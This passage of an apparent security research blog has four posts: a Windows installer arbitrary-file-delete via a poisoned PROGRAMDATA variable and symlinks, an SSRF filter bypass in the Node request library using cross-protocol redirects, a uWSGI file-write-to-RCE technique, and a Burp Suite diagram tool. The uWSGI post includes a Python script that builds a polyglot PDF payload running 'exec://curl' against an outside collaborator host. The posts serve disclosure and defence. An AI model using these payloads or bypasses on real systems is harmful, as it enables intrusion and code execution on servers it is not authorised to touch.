7-Zip provides dedicated Windows Installers which are published on the project page. The following file was tested:

Filename	Version
7z2201-x64.msi	22.01

To better understand the problem, we can study the source code of the application. The installer, defined in the DOC/7zip.wxs file, refers to the ProgramMenuFolder identifier.

     <Directory Id="ProgramMenuFolder" Name="PMenu" LongName="Programs">
        <Directory Id="PMenu" Name="7zip" LongName="7-Zip" />
      </Directory>
      ...
     <Component Id="Help" Guid="$(var.CompHelp)">
        <File Id="_7zip.chm" Name="7-zip.chm" DiskId="1" >
            <Shortcut Id="startmenuHelpShortcut" Directory="PMenu" Name="7zipHelp" LongName="7-Zip Help" />
        </File>
     </Component>

The ProgramMenuFolder is later used to store some components, such as a shortcut to the 7-zip.chm file.

As stated on the MSDN page:

The installer sets the ProgramMenuFolder property to the full path of the Program Menu folder for the current user. If an “All Users” profile exists and the ALLUSERS property is set, then this property is set to the folder in the “All Users” profile.

In other words, the property will either point to the directory controlled by the current user (in %APPDATA% as in the previous example), or to the directory associated with the “All Users” profile.

While the first configuration does not require additional explanation, the second configuration is tricky. The C:\ProgramData\Microsoft\Windows\Start Menu\Programs path is typically used. Although C:\ProgramData itself is writable even by unprivileged users, the C:\ProgramData\Microsoft path is properly locked down. This leaves us with a secure default.

However, the user invoking the repair process may intentionally modify (i.e., poison) the PROGRAMDATA environment variable and thus redirect the “All Users” profile to an arbitrary location that is writable by the user. The setx command can be used for that. It modifies variables associated with the current user, but it’s important to emphasize that only future sessions are affected. A completely new cmd.exe instance should be started to inherit the new settings.

Instead of placing legitimate files, a symlink to an arbitrary file can be placed in the %PROGRAMDATA%\Microsoft\Windows\Start Menu\Programs\7-zip\ directory as one of the expected files. As a result, the repair operation will:

Remove the arbitrary file (using the SYSTEM privileges)
Attempt to restore the original file (using an unprivileged user account)

The second action will fail, resulting in an Arbitrary File Delete primitive. This can be observed on the following capture, assuming we’re targeting the previously created C:\Windows\System32\__doyensec.txt file. We intentionally created a symlink to the targeted file under the C:\FakeProgramData\Microsoft\Windows\Start Menu\Programs\7-zip\7-Zip Help.lnk path.
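The effect of the poisoned variable on path resolution can be sketched as follows. This is only a model of the lookup described above, not the installer’s actual code: the function name is ours, and the folder and shortcut names are taken from the path mentioned in the text.

```javascript
const path = require('path');

// Resolves the "All Users" shortcut location relative to whatever the
// PROGRAMDATA variable points to. path.win32 keeps Windows semantics on any OS.
function allUsersShortcutPath(programData, productFolder, shortcutName) {
  return path.win32.join(
    programData, 'Microsoft', 'Windows', 'Start Menu', 'Programs',
    productFolder, shortcutName
  );
}

// Default value: the path lives under the locked-down C:\ProgramData\Microsoft.
console.log(allUsersShortcutPath('C:\\ProgramData', '7-zip', '7-Zip Help.lnk'));
// Poisoned value: the same relative path now lives in a user-writable tree.
console.log(allUsersShortcutPath('C:\\FakeProgramData', '7-zip', '7-Zip Help.lnk'));
```

The relative part of the path never changes; only the root does, which is why the access control on C:\ProgramData\Microsoft stops protecting the operation once the variable is redirected.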

Firstly, we can see the actions resulting in the REPARSE status. The file is briefly processed (or rather its attributes are), and the SetRenameInformationFile is called on it. The rename part is slightly misleading. What is actually happening is that the file is moved to a different location. This is how the Windows Installer creates rollback instructions in case something goes wrong. As stated before, the SetRenameInformationFile doesn’t work on the file handle level and cannot be impersonated. This action runs with full SYSTEM privileges.

Later on, we can spot attempts to restore the original file, but using an impersonated token. These actions result in ACCESS DENIED errors, therefore the targeted file remains deleted.

The same sequence was observed in numerous other installers. For instance, I worked with PuTTY’s maintainer on a possible workaround, which was introduced in the 0.78 version. In that version, the elevated repair is allowed only if administrator credentials are provided. However, this isn’t functionally equivalent and has introduced some other issues. The 0.79 release should restore the old WiX configuration.

Redirection Guard

The issue was reported directly to Microsoft with all the above information and a dedicated exploit. Microsoft assigned the CVE-2023-21800 identifier to it.

It was reproducible on the latest versions of Windows 10 and Windows 11. However, it was not bounty-eligible as the attack was already mitigated on the Windows 11 Developer Preview. The same mitigation has been enabled with the 2023-02-14 update.

In October 2022 Microsoft shipped a new feature called Redirection Guard on Windows 10 and Windows 11. The update introduced a new type of mitigation called ProcessRedirectionTrustPolicy and the corresponding PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY structure. If the mitigation is enabled for a given process, all processed junctions are additionally verified. The verification first checks if the filesystem junction was created by non-admin users and, if so, if the policy prevents following them. If the operation is prevented, the error 0xC00004BC is returned. The junctions created by admin users are explicitly allowed as having a higher trust-level label.

In the initial round, Redirection Guard was enabled for the print service. The 2023-02-14 update enabled the same mitigation on the msiexec process.

This can be observed in the following ProcMon capture:

The msiexec is one of a few applications that have this mitigation enforced by default. To check for yourself, use the following not-so-great code:

#include <windows.h>
#include <TlHelp32.h>
#include <cstdio>
#include <memory>
#include <string>
#include <type_traits>
#include <utility>
#include <vector>

// RAII wrapper that closes the handle when it goes out of scope.
using AutoHandle = std::unique_ptr<std::remove_pointer_t<HANDLE>, decltype(&CloseHandle)>;
using Proc = std::pair<std::wstring, AutoHandle>;

// Returns the image name and a query handle for every process we may open.
std::vector<Proc> getRunningProcesses() {
    std::vector<Proc> processes;

    HANDLE rawSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (rawSnapshot == INVALID_HANDLE_VALUE) {
        return processes;
    }
    AutoHandle snapshot(rawSnapshot, &CloseHandle);

    // Use the explicit wide-character variants so the code matches
    // std::wstring regardless of whether UNICODE is defined.
    PROCESSENTRY32W pe32{};
    pe32.dwSize = sizeof(pe32);
    if (!Process32FirstW(snapshot.get(), &pe32)) {
        return processes;
    }

    do {
        auto h = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pe32.th32ProcessID);
        if (h) {
            processes.emplace_back(std::wstring(pe32.szExeFile), AutoHandle(h, &CloseHandle));
        }
    } while (Process32NextW(snapshot.get(), &pe32));

    return processes;
}

int main() {
    auto runningProcesses = getRunningProcesses();

    for (auto& process : runningProcesses) {
        // Zero-initialize so a failed query never leaves stale values behind.
        PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY policy{};
        auto result = GetProcessMitigationPolicy(process.second.get(), ProcessRedirectionTrustPolicy, &policy, sizeof(policy));

        // Print only the processes that have the mitigation audited or enforced.
        if (result && (policy.AuditRedirectionTrust | policy.EnforceRedirectionTrust | policy.Flags)) {
            printf("%ws:\n", process.first.c_str());
            printf("\tAuditRedirectionTrust: %u\n\tEnforceRedirectionTrust: %u\n\tFlags: %u\n",
                   static_cast<unsigned>(policy.AuditRedirectionTrust),
                   static_cast<unsigned>(policy.EnforceRedirectionTrust),
                   static_cast<unsigned>(policy.Flags));
        }
    }
    return 0;
}

The Redirection Guard should prevent an entire class of junction attacks and might significantly complicate local privilege escalation attacks. While it addresses the previously mentioned issue, it also addresses other types of installer bugs, such as when a privileged installer moves files from user-controlled directories.

Microsoft Disclosure Timeline

Status	Date
Vulnerability reported to Microsoft	9 Oct 2022
Vulnerability accepted	4 Nov 2022
Patch developed	10 Jan 2023
Patch released	14 Feb 2023

SSRF Cross Protocol Redirect Bypass

2023-03-16T00:00:00+01:00

Server Side Request Forgery (SSRF) is a fairly well-known vulnerability with established prevention methods. So imagine my surprise when I bypassed an SSRF mitigation during a routine retest. Even worse, I bypassed a filter that we had recommended ourselves! I couldn’t let it slip and had to get to the bottom of the issue.

Introduction

Server Side Request Forgery is a vulnerability in which a malicious actor exploits a victim server to perform HTTP(S) requests on the attacker’s behalf. Since the server usually has access to the internal network, this attack is useful to bypass firewalls and IP whitelists to access hosts otherwise inaccessible to the attacker.

Request Library Vulnerability

SSRF attacks can be prevented with address filtering, assuming there are no filter bypasses. One of the classic SSRF filtering bypass techniques is a redirection attack. In these attacks, an attacker sets up a malicious webserver serving an endpoint redirecting to an internal address. The victim server properly allows sending a request to an external server, but then blindly follows a malicious redirection to an internal service.
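To illustrate what address filtering means in its simplest form, here is a deliberately incomplete sketch that classifies IPv4 addresses as internal or external. It is not how any particular library implements its checks: it ignores IPv6 and many special ranges, and the function name is ours.

```javascript
const net = require('net');

// Simplified IPv4-only check covering "this network", loopback, the RFC 1918
// private ranges, and link-local addresses.
function isInternalIPv4(address) {
  if (net.isIP(address) !== 4) {
    throw new Error(`Expected an IPv4 address, got: ${address}`);
  }
  const [a, b] = address.split('.').map(Number);
  return (
    a === 0 ||
    a === 10 ||
    a === 127 ||
    (a === 169 && b === 254) ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168)
  );
}

console.log(isInternalIPv4('127.0.0.1'));     // true
console.log(isInternalIPv4('34.210.62.107')); // false
```

For such a filter to hold against redirection attacks, the check has to run on the address actually being connected to, for every request in the redirect chain, and not only on the URL supplied by the user.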

None of the above is new, of course. All of these techniques have been around for years, and any reputable anti-SSRF library mitigates such risks. And yet, I bypassed one.

The client’s code was a simple endpoint created for integration. During the original engagement, there was no filtering at all. After our test, the client applied an anti-SSRF library, ssrf-req-filter (imported as ssrfFilter). For research and code anonymity purposes, I have extracted the logic into a standalone Node.js script:

const request = require('request');
const ssrfFilter = require('ssrf-req-filter');

let url = process.argv[2];
console.log("Testing", url);

request({
    uri: url,
    agent: ssrfFilter(url),
}, function (error, response, body) {
    console.error('error:', error);
    console.log('statusCode:', response && response.statusCode);
});

To verify a redirect bypass, I created a simple webserver with an open-redirect endpoint in PHP and hosted it on the Internet using my test domain tellico.fun:

<?php header('Location: '.$_GET["target"]); ?>

Initial test demonstrates that the vulnerability is fixed:

$ node test-request.js "http://tellico.fun/redirect.php?target=http://localhost/test" 
Testing http://tellico.fun/redirect.php?target=http://localhost/test
error: Error: Call to 127.0.0.1 is blocked.

But then, I switched the protocol and suddenly I was able to access a localhost service again. Readers should look carefully at the payload, as the difference is minimal:

$ node test-request.js "https://tellico.fun/redirect.php?target=http://localhost/test"
Testing https://tellico.fun/redirect.php?target=http://localhost/test
error: null
statusCode: 200

What happened? The attacker server has redirected the request to another protocol - from HTTPS to HTTP. This is all it took to bypass the anti-SSRF protection.

Why is that? After some digging in the popular request library codebase, I have discovered the following lines in the lib/redirect.js file:

  // handle the case where we change protocol from https to http or vice versa
if (request.uri.protocol !== uriPrev.protocol) {
  delete request.agent
}

According to the code above, anytime a redirect causes a protocol switch, the request agent is deleted. Without this workaround, the client would fail whenever a server caused a cross-protocol redirect. This is needed since the native Node.js http(s).Agent cannot be used with both protocols.

Unfortunately, such behavior also discards any event handling associated with the agent. Given that the SSRF prevention is based on the agent’s createConnection event handler, this unexpected behavior undermines the effectiveness of SSRF mitigation strategies in the request library.
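The consequence can be modeled with a few lines of code. The sketch below is a toy simulation of the behavior described above, not the request library’s implementation: it walks a redirect chain and reports, for each hop, whether the caller-supplied filtering agent would still be attached.

```javascript
// Toy model: the custom agent survives a redirect only while the protocol
// stays the same. Once removed, it is never re-attached.
function agentAttachedPerHop(urls) {
  let agentAttached = true; // the caller supplied a filtering agent
  const hops = [{ url: urls[0], filtered: agentAttached }];
  for (let i = 1; i < urls.length; i++) {
    const prev = new URL(urls[i - 1]);
    const next = new URL(urls[i]);
    if (next.protocol !== prev.protocol) {
      agentAttached = false; // mirrors `delete request.agent`
    }
    hops.push({ url: urls[i], filtered: agentAttached });
  }
  return hops;
}

console.log(agentAttachedPerHop([
  'https://tellico.fun/redirect.php?target=http://localhost/test',
  'http://localhost/test',
]));
```

In this model, the first hop is filtered while the redirected request to localhost is not, which matches the result of the HTTPS test above.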

Disclosure

This issue was disclosed to the maintainers on December 5th, 2022. Despite our best attempts, we have not yet received an acknowledgment. After the 90-day mark, we decided to publish the full technical details as well as a public GitHub issue linked to a pull request for the fix. On March 14th, 2023, a CVE ID was assigned to this vulnerability.

12/05/2022 - First disclosure to the maintainer
01/18/2023 - Another attempt to contact the maintainer
03/08/2023 - A Github issue creation, without the technical details
03/13/2023 - CVE-2023-28155 assigned
03/16/2023 - Full technical details disclosure

Other Libraries

Since a supposedly universal filter turned out to be so dependent on the implementation of the HTTP(S) client, it is natural to ask how other popular libraries handle these cases.

Node-Fetch

The node-fetch library also allows overriding the HTTP(S) agent within its options, without specifying the protocol:

const ssrfFilter = require('ssrf-req-filter');
const fetch = (...args) => import('node-fetch').then(({ default: fetch }) => fetch(...args));

let url = process.argv[2];
console.log("Testing", url);

fetch(url, {
    agent: ssrfFilter(url)
}).then((response) => {
    console.log('Success');
}).catch(error => {
    console.log(`${error.toString().split('\n')[0]}`);
});

Contrary to the request library though, it simply fails in the case of a cross-protocol redirect:

$ node fetch.js "https://tellico.fun/redirect.php?target=http://localhost/test"
Testing https://tellico.fun/redirect.php?target=http://localhost/test
TypeError [ERR_INVALID_PROTOCOL]: Protocol "http:" not supported. Expected "https:"

It is therefore impossible to perform a similar attack on this library.
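If cross-protocol redirects need to succeed while staying filtered, node-fetch documents that the agent option may also be a function that receives the parsed URL and returns an agent. The sketch below shows only the selection logic; the plain http.Agent and https.Agent instances are stand-ins for filtering agents, and we have not verified how ssrf-req-filter agents behave when reused this way.

```javascript
const http = require('http');
const https = require('https');

// Stand-ins for filtering agents; in real code each one would carry the
// SSRF checks for its protocol.
const httpAgent = new http.Agent();
const httpsAgent = new https.Agent();

// Called with the parsed URL of each request in a redirect chain, so the
// agent always matches the protocol of the current hop.
function selectAgent(parsedUrl) {
  return parsedUrl.protocol === 'http:' ? httpAgent : httpsAgent;
}

// Intended usage with node-fetch (not executed here):
//   fetch(url, { agent: selectAgent })
console.log(selectAgent(new URL('http://localhost/test')) === httpAgent);
console.log(selectAgent(new URL('https://tellico.fun/')) === httpsAgent);
```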

Axios

The axios library’s options allow overriding the agents for both protocols separately. Therefore, the following code is protected:

axios.get(url, {
    httpAgent: ssrfFilter("http://domain"),
    httpsAgent: ssrfFilter("https://domain")
})

Note: With the Axios library, it is necessary to hardcode the URLs when overriding the agents. Otherwise, one of the agents would be overwritten with an agent for the wrong protocol, and the cross-protocol redirect would fail similarly to the node-fetch library.

Still, axios calls can be vulnerable. If one forgets to overwrite both agents, the cross-protocol redirect can bypass the filter:

axios.get(url, {
    // httpAgent: ssrfFilter(url),
    httpsAgent: ssrfFilter(url)
})

Such misconfigurations can be easily missed, so we have created a Semgrep rule that catches similar patterns in JavaScript code:

rules:
  - id: axios-only-one-agent-set
    message: Detected an Axios call that overwrites only one HTTP(S) agent. It can lead to a bypass of restriction implemented in the agent implementation. For example SSRF protection can be bypassed by a malicious server redirecting the client from HTTPS to HTTP (or the other way around).
    mode: taint
    pattern-sources:
      - patterns:
        - pattern-either:
            - pattern: |
                {..., httpsAgent:..., ...}
            - pattern: |
                {..., httpAgent:..., ...}
        - pattern-not: |
                {...,httpAgent:...,httpsAgent:...}
    pattern-sinks:
      - pattern: $AXIOS.request(...)
      - pattern: $AXIOS.get(...)
      - pattern: $AXIOS.delete(...)
      - pattern: $AXIOS.head(...)
      - pattern: $AXIOS.options(...)
      - pattern: $AXIOS.post(...)
      - pattern: $AXIOS.put(...)
      - pattern: $AXIOS.patch(...)
    languages:
      - javascript
      - typescript
    severity: WARNING

Summary

As discussed above, we have discovered an exploitable SSRF vulnerability in the popular request library. Despite the fact that this package has been deprecated, this dependency is still used by over 50k projects with over 18M downloads per week.

We demonstrated how an attacker can bypass any anti-SSRF mechanisms injected into this library by simply redirecting the request to another protocol (e.g. HTTP to HTTPS). While many libraries we reviewed did provide protection from such attacks, others such as axios could be potentially vulnerable when similar misconfigurations exist. In an effort to make these issues easier to find and avoid, we have also released our internal Semgrep rule.
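
The condition at the heart of the bypass, a redirect whose target uses a different scheme than the original request, can be checked independently of any HTTP client. The following is a minimal Python sketch of that check, not code from any of the libraries discussed; the function name is hypothetical and only the standard library is used.

```python
from urllib.parse import urljoin, urlsplit


def is_cross_protocol_redirect(request_url: str, location: str) -> bool:
    """Return True when a redirect changes scheme (e.g. https -> http).

    `location` is the raw Location header value; relative values are
    resolved against the request URL first.
    """
    target = urljoin(request_url, location)
    return urlsplit(request_url).scheme != urlsplit(target).scheme


if __name__ == "__main__":
    origin = "https://tellico.fun/redirect.php?target=http://localhost/test"
    print(is_cross_protocol_redirect(origin, "http://localhost/test"))
    print(is_cross_protocol_redirect(origin, "/same-scheme"))
```

A client-side guard built on such a check could refuse the redirect outright, or re-apply the filter with an agent matching the new scheme.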

A New Vector For “Dirty” Arbitrary File Write to RCE

2023-02-28T00:00:00+01:00

Arbitrary file write (AFW) vulnerabilities in web application uploads can be a powerful tool for an attacker, potentially allowing them to escalate their privileges and even achieve remote code execution (RCE) on the server. However, the specific tactics that can be used to achieve this escalation often depend on the specific scenario faced by the attacker. In the wild, there can be several scenarios that an attacker may encounter when attempting to escalate from AFW to RCE in web applications. These can generically be categorized as:

Control of the full file path or of the file name only: In this scenario, the attacker has the ability to control the full file path or the name of the uploaded file, but not its contents. Depending on the permissions applied to the target directory and on the target application, the impact may vary from Denial of Service to interfering with the application logic to bypass potential security-sensitive features.
Control of the file contents only: an attacker has control over the contents of the uploaded file but not over the file path. The impact can vary greatly in this case, due to numerous factors.
Full Arbitrary File Write: an attacker has control over both of the above. This often results in RCE using various methods.

A plethora of tactics have been used in the past to achieve RCE through AFW in moderately hardened environments (in applications running as unprivileged users):

Overwriting or adding files that will be processed by the application server:
- Configuration files (e.g., .htaccess, .config, web.config, httpd.conf, __init__.py and .xml)
- Source files being served from the root of the application (e.g., .php, .asp, .jsp files)
- Temp files
- Secrets or environmental files (e.g., venv)
- Serialized session files
Manipulating procfs to execute arbitrary code
Overwriting or adding files used or invoked by the OS, or by other daemons in the system:
- Crontab routines
- Bash scripts
- .bashrc, .bash_profile and .profile
- authorized_keys and authorized_keys2 - to gain SSH access
- Abusing supervisors’ eager reloading of assets

It’s important to note that only a very small set of these tactics can be used in cases of partial control over the file contents in web applications (e.g., PHP, ASP or temp files). The specific methods used will depend on the specific application and server configuration, so it is important to understand the unique vulnerabilities and attack vectors that are present in the victims’ systems.

The following write-up illustrates a real-world chain of distinct vulnerabilities to obtain arbitrary command execution during one of our engagements, which resulted in the discovery of a new method. This is particularly useful in case an attacker has only partial control over the injected file contents (“dirty write”) or when server-side transformations are performed on its contents.

An example of a “dirty” arbitrary file write

In our scenario, the application had a vulnerable endpoint through which an attacker was able to perform a Path Traversal and write/delete files via a PDF export feature. Its associated function was responsible for:

Reading an existing PDF template file and its stream
Combining the PDF template and the new attacker-provided contents
Saving the results in a PDF file named by the attacker

The attack was limited since it could only impact the files with the correct permissions for the application user, with all of the application files being read-only. While an attacker could already use the vulnerability to first delete the logs or on-file databases, no higher impact was possible at first glance. By looking at the directory, the following file was also available:

    drwxrwxr-x  6 root   root     4096 Nov 18 13:48 .
    -rw-rw-r-- 1 webuser webuser 373 Nov 18 13:46 /app/console/uwsgi-sockets.ini

uWSGI Lax Parsing of Configuration Files

The victim’s application was deployed through a uWSGI application server (v2.0.15) fronting the Flask-based application, acting as a process manager and monitor. uWSGI can be configured using several different methods, including loading configuration from simple files on disk (.ini). The uWSGI native function responsible for parsing these files is defined in core/ini.c:128. The configuration file is initially read in full into memory and scanned to locate the string indicating the start of a valid uWSGI configuration (“[uwsgi]”):

	while (len) {
		ini_line = ini_get_line(ini, len);
		if (ini_line == NULL) {
			break;
		}
		lines++;

		// skip empty line
		key = ini_lstrip(ini);
		ini_rstrip(key);
		if (key[0] != 0) {
			if (key[0] == '[') {
				section = key + 1;
				section[strlen(section) - 1] = 0;
			}
			else if (key[0] == ';' || key[0] == '#') {
				// this is a comment
			}
			else {
				// val is always valid, but (obviously) can be ignored
				val = ini_get_key(key);

				if (!strcmp(section, section_asked)) {
					got_section = 1;
					ini_rstrip(key);
					val = ini_lstrip(val);
					ini_rstrip(val);
					add_exported_option((char *) key, val, 0);
				}
			}
		}

		len -= (ini_line - ini);
		ini += (ini_line - ini);

	}
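
The practical consequence of this loop is that anything outside the requested section is silently skipped, so a valid “[uwsgi]” block can sit in the middle of unrelated or binary data. The following Python sketch is a simplified model of that behavior, not a port of the uWSGI code: the function name is hypothetical, and whitespace handling is approximated with str.strip().

```python
def parse_lax_ini(data: bytes, section_asked: str = "uwsgi") -> list:
    """Collect key/value pairs from `section_asked`, ignoring everything else."""
    options = []
    section = ""
    for raw in data.split(b"\n"):
        # latin-1 maps every byte to a character, so binary junk never raises
        line = raw.decode("latin-1").strip()
        if not line:
            continue  # skip empty line
        if line.startswith("["):
            section = line[1:-1]  # drop the leading '[' and the last character
        elif line[0] in ";#":
            continue  # this is a comment
        else:
            key, _, val = line.partition("=")
            if section == section_asked:
                options.append((key.strip(), val.strip()))
    return options


if __name__ == "__main__":
    blob = b"%PDF-1.3\n\x00\xffbinary junk\n[uwsgi]\nfoo = @(exec://whoami)\n[other]\nbar = 1\n"
    print(parse_lax_ini(blob))
```

In this model, the lines before “[uwsgi]” and after “[other]” never reach the option list, which is what makes a polyglot file viable.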

More importantly, uWSGI configuration files can also include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:

    [uwsgi]
    ; read from a symbol
    foo = @(sym://uwsgi_funny_function)
    ; read from binary appended data
    bar = @(data://0)
    ; read from http
    test = @(http://doyensec.com/hello)
    ; read from a file descriptor
    content = @(fd://3)
    ; read from a process stdout
    body = @(exec://whoami)
    ; call a function returning a char *
    characters = @(call://uwsgi_func)

uWSGI Auto Reload Configuration

While abusing the above .ini files is a good vector, an attacker would still need a way to have the file reloaded (such as triggering a restart of the service via a second DoS bug or waiting for the server to restart). A standard uWSGI deployment configuration flag can ease the exploitation of the bug. In certain cases, the uWSGI configuration specifies the py-auto-reload development option, with which the Python modules are monitored at a user-determined interval (3 seconds in this case), specified as an argument. If a change is detected, it will trigger a reload, e.g.:

    [uwsgi]
    home = /app
    uid = webapp
    gid = webapp
    chdir = /app/console
    socket = 127.0.0.1:8001
    wsgi-file = /app/console/uwsgi-sockets.py
    gevent = 500
    logto = /var/log/uwsgi/%n.log
    harakiri = 30
    vacuum = True
    py-auto-reload = 3
    callable = app
    pidfile = /var/run/uwsgi-sockets-console.pid
    log-maxsize = 100000000
    log-backupname = /var/log/uwsgi/uwsgi-sockets.log.bak

In this scenario, directly writing malicious Python code inside the PDF won’t work, since the Python interpreter will fail when encountering the PDF’s binary data. On the other hand, overwriting a .py file with any data will trigger the uWSGI configuration file to be reloaded.

Putting it all together

In our PDF-exporting scenario, we had to craft a polymorphic, syntactically valid PDF file containing our valid multi-lined .ini configuration file. The .ini payload had to be kept during the merging with the PDF template. We were able to embed the multiline .ini payload inside the EXIF metadata of an image included in the PDF. To build this polyglot file we used the following script:

    from fpdf import FPDF
    from exiftool import ExifToolHelper

    with ExifToolHelper() as et:
        et.set_tags(
            ["doyensec.jpg"],
            tags={"model": "&#x0a;[uwsgi]&#x0a;foo = @(exec://curl http://collaborator-unique-host.oastify.com)&#x0a;"},
            params=["-E", "-overwrite_original"]
        )

    class MyFPDF(FPDF):
        pass

    pdf = MyFPDF()

    pdf.add_page()
    pdf.image('./doyensec.jpg')
    pdf.output('payload.pdf', 'F')
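
The &#x0a; sequences in the tag value are HTML character references for a line feed. ExifTool's -E option applies the inverse HTML conversion when writing, so they end up as real newlines in the stored metadata. The effect can be previewed with Python's standard library; this is only an approximation of ExifTool's conversion, and the helper name is hypothetical.

```python
import html

TAG_VALUE = (
    "&#x0a;[uwsgi]&#x0a;"
    "foo = @(exec://curl http://collaborator-unique-host.oastify.com)&#x0a;"
)


def preview_tag_value(value: str) -> list:
    """Unescape HTML character references and split the result into lines."""
    return html.unescape(value).split("\n")


if __name__ == "__main__":
    for line in preview_tag_value(TAG_VALUE):
        print(repr(line))
```

The section header and the option each land on their own line, which is what a line-based parser needs to see.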

This metadata will be part of the file written on the server. In our exploitation, the eager loading of uWSGI picked up the new configuration and executed our curl payload. The payload can be tested locally with the following command:

    uwsgi --ini payload.pdf

Let’s exploit it on the web server with the following steps:

Upload payload.pdf into /app/console/uwsgi-sockets.ini
Wait for the server to restart or force the uWSGI reload by overwriting any .py file
Verify the callback made by curl on Burp collaborator

Conclusions

As highlighted in this article, we introduced a new uWSGI-based technique. It comes in addition to the tactics already used in various scenarios by attackers to escalate from arbitrary file write (AFW) vulnerabilities in web application uploads to remote code execution (RCE). These techniques are constantly evolving with the server technologies, and new methods will surely be popularized in the future. This is why it is important to share the known escalation vectors with the research community. We encourage researchers to continue sharing information on known vectors, and to continue searching for new, less popular vectors.

Introducing Proxy Enriched Sequence Diagrams (PESD)

2023-02-14T00:00:00+01:00

PESD Exporter is now public!

We are releasing an internal tool to speed up testing and reporting efforts in complex functional flows. We’re excited to announce that PESD Exporter is now available on GitHub.

Modern web platform design involves integrations with other applications and cloud services to add functionalities, share data and enrich the user experience. The resulting functional flows are characterized by multiple state-changing steps with complex trust boundaries and responsibility separation among the involved actors.

In such situations, web security specialists have to manually model sequence diagrams if they want to support their analysis with visualizations of the whole functionality logic.

We all know that constructing sequence diagrams by hand is tedious, error-prone, time-consuming and sometimes even impractical (dealing with more than ten messages in a single flow).

Proxy Enriched Sequence Diagrams (PESD) is our internal Burp Suite extension to visualize web traffic in a way that facilitates the analysis and reporting in scenarios with complex functional flows.

Meet The Format

A Proxy Enriched Sequence Diagram (PESD) is a specific message syntax for sequence diagram models adapted to bring enriched information about the represented HTTP traffic. The MermaidJS sequence diagram syntax is used to render the final diagram.

While classic sequence diagrams for software engineering are meant for abstract visualization, with all the information carried by the diagram itself, PESD is designed to include granular information related to the underlying HTTP traffic being represented, in the form of metadata.

The Enriched part in the format name originates from the diagram-metadata linkability. In fact, the HTTP events in the diagram are marked with flags that can be used to access the specific information from the metadata.

As an example, URL query parameters will be found in the arrow events as UrlParams expandable with a click.

Some key characteristics of the format:

visual-analysis, especially useful for complex application flows in multi-actor scenarios where the listed proxy-view is not suited to visualize the abstract logic
tester-specific syntax to facilitate the analysis and overall readability
parsed metadata from the web traffic to enable further automation of the analysis
usable for reporting purposes like documentation of current implementations or Proof Of Concept diagrams

PESD Exporter - Burp Suite Extension

The extension handles Burp Suite traffic conversion to the PESD format and offers the possibility of executing templates that will enrich the resulting exports.

Once loaded, sending items to the extension will directly result in an export with all the active settings.

Currently, two modes of operation are supported:

Domains as Actors - Each domain involved in the traffic is represented as an actor in the diagram. Suitable for multi-domain flows analysis

Endpoints as Actors - Each endpoint (path) involved in the traffic is represented as an actor in the diagram. Suitable for single-domain flows analysis
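
To give an idea of what the "Domains as Actors" mode means in terms of output, here is a minimal Python sketch that turns a list of requests into plain MermaidJS sequence diagram text. It does not reproduce the PESD syntax or the extension's code; the function name, the input tuple layout and the D1/D2 participant ids are assumptions made for illustration.

```python
from urllib.parse import urlsplit


def to_mermaid(requests, client="Browser"):
    """Render (method, url, status) tuples with one participant per domain."""
    ids = {}   # domain -> short participant id
    body = []
    for method, url, status in requests:
        parts = urlsplit(url)
        host = parts.netloc
        if host not in ids:
            ids[host] = f"D{len(ids) + 1}"
        actor = ids[host]
        body.append(f"    {client}->>{actor}: {method} {parts.path or '/'}")
        body.append(f"    {actor}-->>{client}: {status}")
    header = ["sequenceDiagram", f"    participant {client}"]
    header += [f"    participant {pid} as {host}" for host, pid in ids.items()]
    return "\n".join(header + body)


if __name__ == "__main__":
    print(to_mermaid([
        ("GET", "https://app.example.com/login", 302),
        ("GET", "https://idp.example.com/authorize?client_id=x", 200),
    ]))
```

Switching to an "Endpoints as Actors" view would amount to keying the participants on the path instead of the domain.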

Export Capabilities

Expandable Metadata. Underlined flags can be clicked to show the underlying metadata from the traffic in a scrollable popover
Masked Randoms in URL Paths. UUIDs and pseudorandom strings recognized inside path segments are mapped to variable names <UUID_N> / <VAR_N>. The re-rendering will reshape the diagram to improve flow readability. Every occurrence with the same value maintains the same name
Notes. Comments from Burp Suite are converted to notes in the resulting diagram. Use <br> in Burp Suite comments to obtain multi-line notes in PESD exports
Save as:
- Sequence Diagram in SVG format
- Markdown file (MermaidJS syntax)
- Traffic metadata in JSON format. Read about the metadata structure in the format definition page, “exports section”
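
The masking of random values in URL paths can be sketched as follows. This is a simplified Python illustration rather than the extension's implementation: it only handles UUIDs (the <VAR_N> heuristic for pseudorandom strings is left out), and the function name and 1-based numbering are assumptions.

```python
import re

UUID_RE = re.compile(
    r"^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$"
)


def mask_uuids(paths):
    """Replace UUID path segments with <UUID_N>, reusing N for equal values."""
    names = {}   # normalized UUID -> placeholder
    masked = []
    for path in paths:
        segments = []
        for seg in path.split("/"):
            if UUID_RE.match(seg):
                key = seg.lower()
                if key not in names:
                    names[key] = f"<UUID_{len(names) + 1}>"
                seg = names[key]
            segments.append(seg)
        masked.append("/".join(segments))
    return masked


if __name__ == "__main__":
    print(mask_uuids([
        "/api/users/123e4567-e89b-12d3-a456-426614174000/files",
        "/api/orgs/00000000-0000-0000-0000-000000000001",
        "/api/users/123e4567-e89b-12d3-a456-426614174000",
    ]))
```

Keeping one name per value means the same resource can be followed across the whole flow even after masking.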

Extending the diagram, syntax and metadata with Templates

PESD Exporter supports syntax and metadata extension via templates execution. Currently supported templates are:

OAuth2 / OpenID Connect The template matches standard OAuth2/OpenID Connect flows and adds related flags + flow frame
SAML SSO The template matches Single-Sign-On flows with SAML V2.0 and adds related flags + flow frame

Template matching example for SAML SP-initiated SSO with redirect POST:

The template engine also ensures consistency in the case of crossing flows and bad implementations. The current check prevents nested flow-frames since they cannot be found in real-case scenarios. Nested or unclosed frames inside the resulting markdown are deleted and merged to allow MermaidJS rendering.

Note: Whenever the flow-frame is not displayed during an export involving the supported frameworks, a manual review is highly recommended. This behavior should be considered as a warning that the application is using a non-standard implementation.

Do you want to contribute by writing your own templates? Follow the template implementation guide.

Why PESD?

